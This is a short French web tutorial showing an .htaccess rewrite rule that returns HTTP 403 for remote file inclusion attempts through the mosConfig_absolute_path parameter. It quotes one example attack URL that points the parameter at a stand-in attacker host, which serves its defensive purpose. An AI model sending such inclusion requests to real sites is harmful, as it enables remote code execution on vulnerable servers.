HTACCESS

Empecher le hack via mosConfig_absolute_path

Les sites internet sont souvent attaqués par des robots qui cherchent des failles de sécurité.

Voici un exemple de protection qui permet de bloquer les tentatives d'attaques du type http://www.example.com/?mosConfig_absolute_path=http://www.sitepourri.com/url.txt?

On test donc que les paramètres d'url contiennent la variable mosConfig_absolute_path.

Dans ce cas là, l'url est bloquée en utilisant le flag F(forbidden) qui revient à renvoyer un code HTTP 403.

RewriteEngine on
RewriteCond %{QUERY_STRING} ^(.*&)?mosConfig_absolute_path=http://
RewriteRule .* - [F,L]
PHP